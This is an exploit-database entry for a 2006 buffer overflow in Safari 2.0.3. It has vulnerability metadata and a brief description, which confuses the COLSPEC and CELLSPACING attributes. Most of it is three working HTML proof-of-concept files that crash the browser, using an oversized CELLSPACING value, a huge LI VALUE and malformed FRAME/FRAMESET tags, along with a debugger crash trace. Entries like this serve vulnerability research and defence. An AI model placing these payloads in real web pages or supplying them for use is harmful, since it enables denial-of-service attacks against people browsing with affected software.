Safari 2.0.3 (417.9.2) CELLSPACING Issue

vendor:

Safari

by:

Tom Ferris

7,5

CVSS

HIGH

DoS

119

CWE

Product Name: Safari

Affected Version From: 2.0.3 (417.9.2)

Affected Version To: 2.0.3 (417.9.2)

Patch Exists: YES

Related CWE: N/A

CPE: a:apple:safari:2.0.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Mac OS X 10.4.5

2006

Safari 2.0.3 (417.9.2) CELLSPACING Issue

When a web page contains a <TABLE> tag with a COLSPEC attribute set to a long string, Safari will crash when the page is loaded. This is due to a buffer overflow in the WebCore library. The vulnerability can be triggered by setting the CELLSPACING attribute to a long string.

Mitigation:

Upgrade to the latest version of Safari.

Source

Exploit-DB raw data:

<!--- 
    Safari 2.0.3 (417.9.2) CELLSPACING Issue..
    
    Discovered by:
    Tom Ferris
    <tommy[at]security-protocols[dot]com>
    
    Tested on:
    Mac OS X 10.4.5 using Safari
    
    03/16/2006 Security-Protocols.com
    
    Advisory:
    http://www.security-protocols.com/advisory/sp-xxx
    
    This program is free software; you can redistribute it and/or modify it under 
    the terms of the GNU General Public License version 2, 1991 as published by
    the Free Software Foundation.
!-->

<TABLE COLSPEC=http:SECURITY-PROTOCOLS CELLSPACING=7432679423>
<OBJECT DATA=YIKES>

<!--- 
    Safari 2.0.3 (417.9.2) DoS
    
    Discovered by:
    Tom Ferris
    <tommy[at]security-protocols[dot]com>
    
    Tested on:
    Mac OS X 10.4.3 using Safari
    
    01/05/2006 Security-Protocols.com
    
    Starting program: /Applications/Safari.app/Contents/MacOS/Safari 
    Safari(320,0xa000ed68) malloc: *** vm_allocate(size=759734272) failed (error code=3)
    Safari(320,0xa000ed68) malloc: *** error: can't allocate region 
    Safari(320,0xa000ed68) malloc: *** set a breakpoint in szone_error to debug

    Program received signal EXC_BAD_ACCESS, Could not access memory.
    Reason: KERN_PROTECTION_FAILURE at address: 0x00000000
    0x959cbc98 in -[WebTextRenderer(WebInternal) _CG_drawRun:style:geometry:] ()
    
    This program is free software; you can redistribute it and/or modify it under 
    the terms of the GNU General Public License version 2, 1991 as published by
    the Free Software Foundation.
!-->
	
<LI VALUE=1234567890 TYPE=A>

<!--- 
    Safari 2.0.3 (417.9.2) DoS
    
    Discovered by:
    Tom Ferris
    <tommy[at]security-protocols[dot]com>
    
    Tested on:
    Mac OS X 10.4.5 using Safari
    
    01/05/2006 Security-Protocols.com
    
    Advisory:
    http://www.security-protocols.com/advisory/sp-x24-advisory.php
    
    This program is free software; you can redistribute it and/or modify it under 
    the terms of the GNU General Public License version 2, 1991 as published by
    the Free Software Foundation.
!-->

<TABLE>
<FRAME SCROLLING= NAME=TOMFERRIS SRC= SCROLLING=>
<FRAMESET>

# milw0rm.com [2006-04-24]